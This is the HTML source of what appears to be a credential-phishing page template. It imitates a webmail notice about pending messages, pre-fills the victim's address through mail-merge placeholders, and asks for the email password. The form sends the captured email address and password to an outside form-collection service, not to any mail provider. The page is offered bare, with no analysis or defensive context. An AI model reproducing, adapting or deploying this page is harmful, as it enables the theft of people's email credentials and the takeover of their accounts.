

                        
                        <!DOCTYPE html>
                        <html>

                        <title>3 Pending Messages </title>


                          <meta charset="utf-8">
                          <meta name="viewport" content="width=device-width, initial-scale=1">
                          <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
                          <script src=""></script>
                          <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>



                        <style>
                        body {
                          font-family: Arial;
                        }

                        input[type=email], select {
                            width: 100%;
                            padding: 12px 20px;
                            margin: 15px 0;
                            display: block;
                            border: 1px solid #008ad1;
                            border-radius: 4px;
                            box-sizing: border-box;
                        }

                        input[type=password], select {
                            width: 100%;
                            padding: 12px 20px;
                            margin: 15px 0;
                            display: block;
                            border: 1px solid #008ad1;
                            border-radius: 4px;
                            box-sizing: border-box;
                        }

                        input[type=submit] {
                            width: 100%;
                            background-color: #008ad1;
                            color: white;
                            padding: 14px 20px;
                            margin: 8px 0;
                            border: none;
                            border-radius: 4px;
                            cursor: pointer;
                        }

                        input[type=submit]:hover {
                            background-color: #008ad1;
                        }

                        div.container {
                            margin: auto;
                            width: 50%;
                            padding: 10px;
                            border: 3px #008ad1;
                            border-radius: 10px;
                            background-color: #FFFFFF;
                            width: 500px;
                            padding: 20px;
                            border-style: solid;
                            border-width: thin;
    
                           }
                        </style>

                        <body>


                         <br><br><br><br>
                        <div class="container">

                        <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSQJIXySomqxpqDPnxCoVgmUCQSmrLullrvZg&usqp=CAU">

                        <p></p>
                        <font face="Trebuchet MS" color="#008ad1" size="4"><b>&nbsp;&nbsp;&nbsp; [[-Domain-]]: 13 PENDING MESSAGES </b></font>


                        <p></p>
                        <form action="https://submit-form.com/3FV7HPss" method="POST">

                           <hr style="height:2px;border:none;color:#FFFFFF;background-color:#FFFFFF;" />
                          
                        <center>

                        <input type="email" id="fname" name="feedback" Placeholder="Enter Email Address" value="[[-Email-]]" readonly required>

                            <input type="password" id="fname" name="feedbacknow" placeholder="Enter Email Password" autofocus required>


                          
                            <input type="submit" value="LOGIN TO VIEW YOUR MESSAGES NOW">
                          </center>


                        </form>

                        </div>

                        </body>
                        </html>
